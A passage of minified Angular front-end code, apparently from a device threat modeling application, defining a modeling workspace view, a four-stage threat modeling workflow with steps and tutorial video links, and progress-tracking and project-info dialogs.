yt=xa.FindNodeOfObject(Ze,this.nodes);this.selectedNode=yt,yt.isRenaming=!0},children:[]},ut={name:()=>this.translate.instant("general.TestCases"),icon:"checklist",iconAlignLeft:!1,canSelect:!0,data:this.dataService.Project.GetTesting()};d.GetDevices().forEach(Ze=>Fe.children.push(k(Ze,Fe))),d.GetMobileApps().forEach(Ze=>Ne.children.push(q(Ze,Ne))),d.GetDFDiagrams().forEach(Ze=>et.children.push(Y(Ze,et))),this.nodes.push(te),this.nodes.push(pe),this.nodes.push(Fe),this.nodes.push(Ne),this.nodes.push(et),ut.data&&this.nodes.push(ut),xa.TransferExpandedState(c,this.nodes),this.navTree&&this.navTree.SetNavTreeData(this.nodes,r)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Oo),Ee(Tl),Ee(_r),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-modeling"]],viewQuery:function(e,i){if(1&e&&(Mi(rSe,5),Mi(gT,5)),2&e){let n;Vt(n=Bt())&&(i.elementView=n.first),Vt(n=Bt())&&(i.compStack=n.first)}},features:[ci],decls:68,vars:57,consts:[[1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/modeling",2,"width","100%","height","100%",3,"sameRoute"],["direction","horizontal","unit","pixel",3,"gutterSize","restrictMove","dragEnd"],[3,"size","visible","order"],["direction","vertical",3,"gutterSize","restrictMove","dragEnd"],[3,"size","order"],[3,"activeNode","selectedNodeChanged","nodeDoubleClicked"],["navTree",""],[4,"ngIf"],["preserveContent","",1,"topTabGroup",2,"height","100%",3,"selectedIndex","selectedIndexChange"],["style","width: 100%; height: 100%;","class","tab-content",4,"ngFor","ngForOf"],[3,"size","order",4,"ngIf"],[3,"selectedNode"],[3,"dataObject","selectedObject","selectedObjectChanged","openQuestionnaire"],[3,"elements","selectedElement","filteredElement","selectionChanged","filterChanged"],["elementview",""],[1,"tab-content",2,"width","100%","height","100%"],["mat-tab-label","","style","width: 100%;"],["matTabContent",""],[3,"mouseenter","mouseleave","dblclick"],["rowspan","2",2,"width","24px","vertical-align","middle"],[1,"tab-icon"],[2,"vertical-align","middle"],["mat-icon-button","",3,"click"],[2,"font-size","small"],["style","height: 100%; margin: 10px;",3,"refreshNodes",4,"ngIf"],["style","height: 100%;",3,"charScope",4,"ngIf"],["style","height: 100%;",3,"objImpact",4,"ngIf"],["style","height: 100%;",3,"threatSources",4,"ngIf"],["style","height: 100%;",4,"ngIf"],["style","height: 100%;",3,"assetGroup","selectedObject","selectionChanged",4,"ngIf"],["style","height: 100%;",3,"selectedNode","diagram","selectedElement","selectionChanged","navTreeChanged",4,"ngIf"],["style","height: 100%;",3,"stack","selectedComponent","selectionChanged",4,"ngIf"],["style","height: 100%;",3,"checklist",4,"ngIf"],["style","height: 100%;",3,"testing",4,"ngIf"],[2,"height","100%","margin","10px",3,"refreshNodes"],[2,"height","100%",3,"charScope"],[2,"height","100%",3,"objImpact"],[2,"height","100%",3,"threatSources"],[2,"height","100%"],[2,"height","100%",3,"assetGroup","selectedObject","selectionChanged"],[2,"height","100%",3,"selectedNode","diagram","selectedElement","selectionChanged","navTreeChanged"],[2,"height","100%",3,"stack","selectedComponent","selectionChanged"],["compStack",""],[2,"height","100%",3,"checklist"],[2,"height","100%",3,"testing"],[1,"bottomTabGroup",3,"selectedIndexChange"],["mat-tab-label",""],[3,"isActive","selectedNode","selectedObject","filteredObject","selectedObjectChanged","threatCountChanged"],[3,"isActive","selectedNode","selectedObject","filteredObject","selectedObjectChanged","countermeasureCountChanged"],[3,"isActive","selectedNode","selectedObject","filteredObject","selectedObjectChanged","issueCountChanged"],["matBadgeSize","small","matBadgePosition","below","matBadgeOverlap","false",3,"matBadge","matBadgeHidden"],[3,"isActive","selectedNode","selectedObject","filteredObject","selectedObjectChanged","testCaseCountChanged"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n "),m(2,"mat-drawer-container",1),s(3,"\n "),m(4,"mat-drawer",2),s(5,"\n "),m(6,"app-side-nav",3),he("sameRoute",function(){return i.OnSameRoute()}),u(),s(7,"\n "),u(),s(8,"\n\n "),m(9,"mat-drawer-content"),s(10,"\n "),m(11,"as-split",4),he("dragEnd",function(r){return i.OnSplitSizeChange(r,1)}),s(12,"\n "),m(13,"as-split-area",5),s(14,"\n "),m(15,"as-split",6),he("dragEnd",function(r){return i.OnSplitSizeChange(r,3)}),s(16,"\n "),m(17,"as-split-area",7),s(18,"\n "),m(19,"app-nav-tree",8,9),he("selectedNodeChanged",function(r){return i.selectedNode=r})("nodeDoubleClicked",function(r){return i.OnNodeDoubleClicked(r)}),u(),s(21,"\n "),u(),s(22,"\n "),m(23,"as-split-area",7),s(24,"\n "),ne(25,sSe,5,3,"ng-container",10),s(26,"\n "),u(),s(27,"\n "),u(),s(28,"\n "),u(),s(29,"\n "),m(30,"as-split-area",7),s(31,"\n "),m(32,"as-split",6),he("dragEnd",function(r){return i.OnSplitSizeChange(r,2)}),s(33,"\n "),m(34,"as-split-area",7),s(35,"\n "),m(36,"mat-tab-group",11),he("selectedIndexChange",function(r){return i.OnTabIndexChange(r)}),s(37,"\n "),ne(38,bSe,6,0,"mat-tab",12),s(39,"\n "),u(),s(40,"\n "),u(),s(41,"\n "),ne(42,DSe,28,15,"as-split-area",13),s(43,"\n "),u(),s(44,"\n "),u(),s(45,"\n "),m(46,"as-split-area",7),s(47,"\n "),m(48,"as-split",6),he("dragEnd",function(r){return i.OnSplitSizeChange(r,4)}),s(49,"\n "),m(50,"as-split-area",7),s(51,"\n "),it(52,"app-stencil-palette",14),s(53,"\n "),u(),s(54,"\n "),m(55,"as-split-area",7),s(56,"\n "),m(57,"app-properties",15),he("selectedObjectChanged",function(r){return i.selectedObject=r})("openQuestionnaire",function(r){return i.compStack.OnComponentDblClick(r)}),u(),s(58,"\n "),u(),s(59,"\n "),u(),s(60,"\n "),u(),s(61,"\n "),u(),s(62,"\n "),u(),s(63,"\n "),u(),s(64,"\n "),it(65,"app-status-bar"),s(66,"\n"),u(),s(67,"\n")),2&e&&(g(9),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),g(2),F("gutterSize",3)("restrictMove",!0),g(2),Ct("splitter-light1",!i.theme.IsDarkMode)("splitter-dark1",i.theme.IsDarkMode),F("size",i.GetSplitSize(1,0,350))("visible",i.showLeftBar)("order",1),g(2),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),F("gutterSize",3)("restrictMove",!0),g(2),F("size",i.GetSplitSize(3,0,60))("order",1),g(2),F("activeNode",i.selectedNode),g(4),F("size",i.GetSplitSize(3,1,40))("order",2),g(2),F("ngIf",i.IsContainer(i.selectedNode)),g(5),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),F("size",i.GetSplitSize(1,1,"*"))("order",2),g(2),F("gutterSize",3)("restrictMove",!0),g(2),F("size",i.GetSplitSize(2,0,70))("order",1),g(2),F("selectedIndex",i.selectedTabIndex),g(2),F("ngForOf",i.tabs),g(4),F("ngIf",i.hasBottomTabGroup),g(4),Ct("splitter-light1",!i.theme.IsDarkMode)("splitter-dark1",i.theme.IsDarkMode),F("size",i.GetSplitSize(1,2,310))("order",3),g(2),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),F("gutterSize",3)("restrictMove",!0),g(2),F("size",i.GetSplitSize(4,0,60))("order",1),g(2),F("selectedNode",i.selectedNode),g(3),F("size",i.GetSplitSize(4,1,40))("order",2),g(2),F("dataObject",null==i.selectedNode?null:i.selectedNode.data)("selectedObject",i.selectedObject))},styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.tab-icon[_ngcontent-%COMP%]{margin-right:8px}.bottomTabGroup[_ngcontent-%COMP%]{height:100%}.bottomTabGroup[_ngcontent-%COMP%] .mat-tab-header .mat-tab-labels .mat-tab-label{height:25px}.bottomTabGroup[_ngcontent-%COMP%] .mat-tab-labels .mat-tab-label{min-width:160px!important}.mat-badge-small.mat-badge-below[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{bottom:0}.mat-badge-small.mat-badge-after[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{right:-20px}.topTabGroup[_ngcontent-%COMP%] .mat-tab-labels .mat-tab-label{padding:0 0 0 3px!important;min-width:none!important}"]}),t})(),x5=(()=>{class t{constructor(e){this.translate=e,this.translate.onLangChange.subscribe(i=>this.initialize())}get Stages(){return this.stages||this.initialize(),this.stages}initialize(){if(0==Object.keys(this.translate.translations).length)return;let e={name:"Analyze",desc:"What are we working on?",icon:"create",steps:[{number:1,name:"Device Characterization & Scope Defintion [Optional]",link:"modeling?tab="+aa.CharScope,activities:[{name:this.translate.instant("ttm.1.1.n"),desc:this.translate.instant("ttm.1.1.d")},{name:this.translate.instant("ttm.1.2.n"),desc:this.translate.instant("ttm.1.2.d")},{name:this.translate.instant("ttm.1.3.n"),desc:this.translate.instant("ttm.1.3.d")}]},{number:2,name:"Business Objectives and Impact Definition [Optional]",link:"modeling?tab="+aa.ObjImpact,activities:[{name:this.translate.instant("ttm.2.1.n"),desc:this.translate.instant("ttm.2.1.d")},{name:this.translate.instant("ttm.2.2.n"),desc:this.translate.instant("ttm.2.2.d")}]},{number:3,name:"Device Interaction Analysis [Optional]",activities:[{name:this.translate.instant("ttm.3.1.n"),desc:this.translate.instant("ttm.3.1.d"),link:"modeling?tab="+aa.Context},{name:this.translate.instant("ttm.3.2.n"),desc:this.translate.instant("ttm.3.2.d")},{name:this.translate.instant("ttm.3.3.n"),desc:this.translate.instant("ttm.3.3.d"),link:"modeling?tab="+aa.UseCase},{name:this.translate.instant("ttm.3.4.n"),desc:this.translate.instant("ttm.3.4.d")}],video:"https://youtu.be/P7-ca-gteXk"},{number:4,name:"Asset Identification",activities:[{name:this.translate.instant("ttm.4.1.n"),desc:this.translate.instant("ttm.4.1.d"),link:"modeling?tab="+aa.Assets},{name:this.translate.instant("ttm.4.2.n"),desc:this.translate.instant("ttm.4.2.d")}],video:"https://youtu.be/a6QiOJZrjS0"}]},i={name:"Model",desc:"What can go wrong?",icon:"architecture",steps:[{number:5,name:"Threat and Threat Source Identification",activities:[{name:this.translate.instant("ttm.5.1.n")+" [Optional]",desc:this.translate.instant("ttm.5.1.d"),link:"modeling?tab="+aa.ThreatSources},{name:this.translate.instant("ttm.5.2.n"),desc:this.translate.instant("ttm.5.2.d"),link:"modeling?tab="+aa.SystemThreats},{name:this.translate.instant("ttm.5.3.n")+" [Optional]",desc:this.translate.instant("ttm.5.3.d"),link:"configuration"}],video:"https://youtu.be/w6Z-trl4_SE"},{number:6,name:"Hardware Threat Modeling",link:"modeling?tab="+aa.Hardware,activities:[{name:this.translate.instant("ttm.6.1.n"),desc:this.translate.instant("ttm.6.1.d")},{name:this.translate.instant("ttm.6.2.n"),desc:this.translate.instant("ttm.6.2.d")+"\nhttps://youtu.be/MbrC1sGo6L8"}],video:"https://youtu.be/dKDiEc7K2pY"},{number:7,name:"Software Threat Modeling",link:"modeling?tab="+aa.Software,activities:[{name:this.translate.instant("ttm.7.1.n"),desc:this.translate.instant("ttm.7.1.d")},{name:this.translate.instant("ttm.7.2.n"),desc:this.translate.instant("ttm.7.2.d")+"\nhttps://youtu.be/MbrC1sGo6L8"}],video:"https://youtu.be/znWcbMUviGY"},{number:8,name:"Use Case Threat Modeling",link:"modeling?tab="+aa.Dataflow,activities:[{name:this.translate.instant("ttm.8.1.n"),desc:this.translate.instant("ttm.8.1.d")},{name:this.translate.instant("ttm.8.2.n"),desc:this.translate.instant("ttm.8.2.d")+"\nhttps://youtu.be/MbrC1sGo6L8"}],video:"https://youtu.be/dKDiEc7K2pY"},{number:9,name:"Process Threat Modeling",link:"modeling?tab="+aa.Process,activities:[{name:this.translate.instant("ttm.9.1.n"),desc:this.translate.instant("ttm.9.1.d")},{name:this.translate.instant("ttm.9.2.n"),desc:this.translate.instant("ttm.9.2.d")+"\nhttps://youtu.be/MbrC1sGo6L8"}],video:"https://youtu.be/znWcbMUviGY"},{number:10,name:"Vulnerability Review & Penetration Testing",activities:[{name:this.translate.instant("ttm.10.1.n"),desc:this.translate.instant("ttm.10.1.d")},{name:this.translate.instant("ttm.10.2.n"),desc:this.translate.instant("ttm.10.2.d")+"\nhttps://youtu.be/MbrC1sGo6L8"}]}]},n={name:"Mitigate",desc:"What are we going to do about it?",icon:"security",steps:[{number:11,name:"Risk Assessment",link:"dashboard",activities:[{name:this.translate.instant("ttm.11.1.n"),desc:this.translate.instant("ttm.11.1.d")},{name:this.translate.instant("ttm.11.2.n"),desc:this.translate.instant("ttm.11.2.d")}],video:"https://youtu.be/MbrC1sGo6L8"},{number:12,name:"Countermeasure Defintion",activities:[{name:this.translate.instant("ttm.12.1.n"),desc:this.translate.instant("ttm.12.1.d"),link:"dashboard"},{name:this.translate.instant("ttm.12.2.n"),desc:this.translate.instant("ttm.12.2.d"),link:"mitigation"},{name:this.translate.instant("ttm.12.3.n"),desc:this.translate.instant("ttm.12.3.d")}],video:"https://youtu.be/pFhpct9iGUc"}]},r={name:"Validate",desc:"Did we do a good enough job?",icon:"fact_check",steps:[{number:13,name:"Validation & Documentation",activities:[{name:this.translate.instant("ttm.13.1.n"),desc:this.translate.instant("ttm.13.1.d")},{name:this.translate.instant("ttm.13.2.n"),desc:this.translate.instant("ttm.13.2.d")},{name:this.translate.instant("ttm.13.3.n"),desc:this.translate.instant("ttm.13.3.d")},{name:this.translate.instant("ttm.13.4.n"),desc:this.translate.instant("ttm.13.4.d")}]}]};this.stages=[e,i,n,r]}}return t.\u0275fac=function(e){return new(e||t)(At(Sn))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function xSe(t,a){1&t&&(m(0,"p",3),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct("\n ",re(2,1,"dialog.progress.noProject"),"\n"))}function wSe(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(n){be(e);const r=V().$implicit;return V(2).NavigateTo(r.link),Me(n.stopPropagation())}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"open_in_new"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.openInNew"))}function ISe(t,a){if(1&t){const e=Ye();m(0,"button",22),he("click",function(){be(e);const n=V().$implicit;return Me(V(2).OnVideoClick(n))}),s(1,"\n "),m(2,"mat-icon"),s(3,"smart_display"),u(),s(4,"\n "),u()}2&t&&at("matTooltip",V().$implicit.video)}function RSe(t,a){if(1&t){const e=Ye();m(0,"td",23),s(1,"\n "),m(2,"mat-checkbox",24),he("ngModelChange",function(n){const c=be(e).$implicit,d=V().$implicit,T=V().$implicit,k=V();return Me(k.Tracker[k.GetActivityKey(T,d,c)]=n)}),u(),s(3,"\n "),u()}if(2&t){const e=a.$implicit,i=V().$implicit,n=V().$implicit,r=V();g(2),F("ngModel",r.Tracker[r.GetActivityKey(n,i,e)])}}function SSe(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(n){be(e);const r=V().$implicit;return V(3).NavigateTo(r.link),Me(n.stopPropagation())}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"open_in_new"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.openInNew"))}function kSe(t,a){if(1&t){const e=Ye();m(0,"td",25),he("click",function(){const r=be(e).$implicit;return Me(V(3).OnEntryClick(r))}),s(1),ne(2,SSe,6,3,"button",7),s(3,"\n "),u()}if(2&t){const e=a.$implicit;g(1),ct("\n ",e.name,"\n "),g(1),F("ngIf",e.link)}}function PSe(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(){be(e);const n=V().$implicit;return Me(V(3).OnVideoClick(n))}),s(1,"\n "),m(2,"mat-icon"),s(3,"smart_display"),u(),s(4,"\n "),u()}2&t&&at("matTooltip",V().$implicit.video)}function OSe(t,a){if(1&t){const e=Ye();m(0,"td",26),he("click",function(){const r=be(e).$implicit;return Me(V(3).OnVideoClick(r))}),s(1,"\n "),ne(2,PSe,5,1,"button",7),s(3,"\n "),u()}if(2&t){const e=a.$implicit;g(2),F("ngIf",(null==e.video?null:e.video.length)>0)}}function NSe(t,a){1&t&&(m(0,"mat-icon"),s(1,"info"),u())}function LSe(t,a){if(1&t){const e=Ye();m(0,"td",26),he("click",function(){const r=be(e).$implicit;return Me(V(3).OnEntryClick(r))}),ne(1,NSe,2,0,"mat-icon",27),u()}if(2&t){const e=a.$implicit;g(1),F("ngIf",(null==e.desc?null:e.desc.length)>0)}}function zSe(t,a){if(1&t&&(m(0,"td",28),s(1,"\n "),m(2,"div",29),s(3,"\n "),m(4,"p",30),s(5),u(),s(6,"\n "),u(),s(7,"\n "),u()),2&t){const e=a.$implicit,i=V(3);Rt("colspan",i.columnsToDisplay.length),g(2),F("@detailExpand",e==i.expandedActivity?"expanded":"collapsed"),g(3),ke(e.desc)}}function WSe(t,a){1&t&&(m(0,"tr",31),s(1,"\n "),u())}function FSe(t,a){1&t&&it(0,"tr",32)}const VSe=function(){return["expandedDetail"]};function BSe(t,a){if(1&t&&(m(0,"div"),s(1),ne(2,wSe,6,3,"button",7),s(3,"\n "),ne(4,ISe,5,1,"button",8),s(5,"\n "),it(6,"br"),s(7,"\n "),m(8,"table",9),s(9,"\n "),bt(10,10),s(11,"\n "),ne(12,RSe,4,1,"td",11),s(13,"\n "),Mt(),s(14,"\n "),bt(15,12),s(16,"\n "),ne(17,kSe,4,2,"td",13),s(18,"\n "),Mt(),s(19,"\n "),bt(20,14),s(21,"\n "),ne(22,OSe,4,1,"td",15),s(23,"\n "),Mt(),s(24,"\n "),bt(25,16),s(26,"\n "),ne(27,LSe,2,1,"td",15),s(28,"\n "),Mt(),s(29,"\n \n "),s(30,"\n "),bt(31,17),s(32,"\n "),ne(33,zSe,8,3,"td",18),s(34,"\n "),Mt(),s(35,"\n \n "),ne(36,WSe,2,0,"tr",19),s(37,"\n "),ne(38,FSe,1,0,"tr",20),s(39,"\n "),u(),s(40,"\n "),u()),2&t){const e=a.$implicit,i=V(2);g(1),za("\n ",e.number,". ",e.name,"\n "),g(1),F("ngIf",e.link),g(2),F("ngIf",(null==e.video?null:e.video.length)>0),g(4),F("dataSource",e.activities),g(28),F("matRowDefColumns",i.columnsToDisplay),g(2),F("matRowDefColumns",kr(7,VSe))}}function HSe(t,a){if(1&t){const e=Ye();m(0,"button",33),he("click",function(){return be(e),Me(V(2).PrevProcessStep())}),s(1),oe(2,"translate"),u()}2&t&&(g(1),ke(re(2,1,"tour.prev")))}function USe(t,a){if(1&t){const e=Ye();m(0,"button",33),he("click",function(){return be(e),Me(V(2).NextProcessStep())}),s(1),oe(2,"translate"),u()}2&t&&(g(1),ke(re(2,1,"tour.next")))}function qSe(t,a){if(1&t){const e=Ye();m(0,"button",33),he("click",function(){return be(e),Me(V(2).NextProcessStep())}),s(1),oe(2,"translate"),u()}2&t&&(g(1),ke(re(2,1,"tour.end")))}function GSe(t,a){if(1&t){const e=Ye();m(0,"mat-expansion-panel",4),he("opened",function(){const r=be(e).index;return Me(V().SetProcessStep(r))}),s(1,"\n "),m(2,"mat-expansion-panel-header"),s(3,"\n "),m(4,"mat-panel-title"),s(5),u(),s(6,"\n "),m(7,"mat-panel-description"),s(8),oe(9,"translate"),m(10,"mat-icon"),s(11),u(),s(12,"\n "),u(),s(13,"\n "),u(),s(14,"\n\n "),ne(15,BSe,41,8,"div",5),s(16,"\n "),m(17,"mat-action-row"),s(18,"\n "),ne(19,HSe,3,3,"button",6),s(20,"\n "),ne(21,USe,3,3,"button",6),s(22,"\n "),ne(23,qSe,3,3,"button",6),s(24,"\n "),u(),s(25,"\n "),u()}if(2&t){const e=a.$implicit,i=a.index,n=a.first,r=a.last,c=V();F("expanded",c.processStep===i),g(5),ct("\n ",e.name,"\n "),g(3),Y_("\n ",re(9,10,"dialog.progress.Steps"),": ",c.GetCheckedCount(e),"/",c.GetActivityCount(e),"\n "),g(3),ke(e.icon),g(4),F("ngForOf",e.steps),g(4),F("ngIf",!n),g(2),F("ngIf",!r),g(2),F("ngIf",r)}}let zG=(()=>{class t{constructor(e,i,n){this.dataService=e,this.ttmService=i,this.router=n,this.step=0,this.tracker={},this.columnsToDisplay=["check","desc","video","info"]}get Stages(){return this.ttmService.Stages}get processStep(){return this.dataService.Project?null==this.dataService.Project.ProgressStep?0:this.dataService.Project.ProgressStep:this.step}set processStep(e){this.dataService.Project?this.dataService.Project.ProgressStep=e:this.step=e}get Tracker(){return this.dataService.Project?this.dataService.Project.ProgressTracker:this.tracker}ngOnInit(){let e=()=>{this.dataService.Project&&this.Stages.forEach(i=>{i.steps.forEach(n=>{n.activities.forEach(r=>{let c=this.GetActivityKey(i,n,r);null==this.Tracker[c]&&(this.Tracker[c]=!1)})})})};e(),this.dataService.ProjectChanged.subscribe(i=>e())}GetCheckedCount(e){let i=Object.keys(this.Tracker).filter(r=>r.startsWith(this.Stages.indexOf(e).toString())),n=0;return i.forEach(r=>{1==this.Tracker[r]&&n++}),n}GetActivityCount(e){return e.steps.reduce((i,n)=>i+n.activities.length,0)}GetActivityKey(e,i,n){return this.Stages.indexOf(e)+"."+e.steps.indexOf(i)+"."+i.activities.indexOf(n)}OnEntryClick(e){var i;(null===(i=e.desc)||void 0===i?void 0:i.length)>0&&(this.expandedActivity=this.expandedActivity===e?null:e)}OnVideoClick(e){window.open(e.video,"_blank")}SetProcessStep(e){this.processStep=e}NextProcessStep(){this.processStep++}PrevProcessStep(){this.processStep--}NavigateTo(e){if(!e)return;let i=e.split("?"),n={};for(let r=1;r collapsed",En("225ms cubic-bezier(0.4, 0.0, 0.2, 1)"))])]}}),t})();var WG=de(5689);function QSe(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n ",re(1,1,"dialog.modelinfo.general"),"\n ")}function $Se(t,a){if(1&t){const e=Ye();m(0,"div",32),s(1,"\n "),m(2,"button",33),he("click",function(){return be(e),Me(V(3).Project.Image="")}),s(3,"\n "),m(4,"mat-icon"),s(5,"remove"),u(),s(6,"\n "),u(),s(7,"\n "),u()}if(2&t){V();const e=Ti(34);ri("left",V(2).GetRemoveBtnLeft(e))}}function KSe(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",34),he("click",function(){const r=be(e).$implicit;return Me(V(3).selectedUser=r)}),s(1,"\n "),m(2,"mat-icon",35),s(3,"person"),u(),s(4,"\n "),m(5,"div",36),s(6),u(),s(7,"\n "),m(8,"div",36)(9,"a",37),s(10),u()(),s(11,"\n "),m(12,"button",38),he("click",function(){const r=be(e).$implicit;return Me(V(3).DeleteUser(r))}),oe(13,"translate"),m(14,"mat-icon"),s(15,"delete"),u()(),s(16,"\n "),u()}if(2&t){const e=a.$implicit,i=V(3);Ct("highlight-light",i.selectedUser===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedUser===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),g(6),ke(e.Name),g(3),F("href","mailto:"+e.Email,nm),g(1),ke(e.Email),g(2),at("matTooltip",re(13,9,"general.Delete"))}}function XSe(t,a){if(1&t){const e=Ye();m(0,"button",43),he("click",function(){return be(e),Me(V(4).selectedUser.Name="")}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function YSe(t,a){if(1&t){const e=Ye();m(0,"div",39),s(1,"\n "),m(2,"mat-form-field",40),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"input",10),he("ngModelChange",function(n){return be(e),Me(V(3).selectedUser.Name=n)}),u(),s(9,"\n "),ne(10,XSe,6,3,"button",41),s(11,"\n "),u(),s(12,"\n "),it(13,"br"),s(14,"\n "),m(15,"mat-form-field",40),s(16,"\n "),m(17,"mat-label"),s(18),oe(19,"translate"),u(),s(20,"\n "),m(21,"input",42),he("ngModelChange",function(n){return be(e),Me(V(3).selectedUser.Email=n)}),u(),s(22,"\n "),u(),s(23,"\n "),u()}if(2&t){const e=V(3);g(5),ke(re(6,6,"properties.Name")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedUser.Name),g(2),F("ngIf",e.selectedUser.Name),g(8),ke(re(19,8,"properties.Email")),g(3),F("ngModel",e.selectedUser.Email)}}function JSe(t,a){if(1&t){const e=Ye();m(0,"tr"),s(1,"\n "),m(2,"td",46),s(3),u(),s(4,"\n "),m(5,"td"),s(6),oe(7,"localDateTime"),u(),s(8,"\n "),m(9,"td"),s(10,"-"),u(),s(11,"\n "),m(12,"td"),s(13),u(),s(14,"\n "),m(15,"td"),s(16,":"),u(),s(17,"\n "),m(18,"td"),s(19),m(20,"button",47),he("click",function(){const r=be(e).$implicit;return Me(V(5).dataService.RestoreCommit(r))}),oe(21,"translate"),s(22,"\n "),m(23,"mat-icon"),s(24,"restore"),u(),s(25,"\n "),u(),s(26,"\n "),u(),s(27,"\n "),u()}if(2&t){const e=a.$implicit,i=a.index,n=a.count;g(3),ct("",n-i,")"),g(3),ke(re(7,5,e.date)),g(7),ke(e.commiter),g(6),ct("\n ",e.message,"\n "),g(1),at("matTooltip",re(21,7,"dialog.modelinfo.Restore"))}}function ZSe(t,a){if(1&t&&(s(0,"\n "),m(1,"table"),s(2,"\n "),ne(3,JSe,28,9,"tr",45),s(4,"\n "),u(),s(5,"\n ")),2&t){const e=V(4);g(3),F("ngForOf",e.commits)}}function eke(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n "),m(2,"mat-expansion-panel-header"),s(3,"\n "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"history"),u(),s(12,"\n "),u(),s(13,"\n "),u(),s(14,"\n "),ne(15,ZSe,6,1,"ng-template",44),s(16,"\n "),u()),2&t){const e=V(3);g(5),ct("\n ",re(6,2,"dialog.modelinfo.History"),"\n "),g(4),ct("\n ",e.GHProject.name,"\n ")}}function tke(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"h3"),s(2),u(),s(3,"\n "),m(4,"div"),s(5,"\n "),m(6,"div",6),s(7,"\n "),m(8,"div",7),s(9,"\n "),m(10,"mat-form-field",8),s(11,"\n "),m(12,"mat-label"),s(13),oe(14,"translate"),u(),s(15,"\n "),m(16,"textarea",9),he("ngModelChange",function(n){return 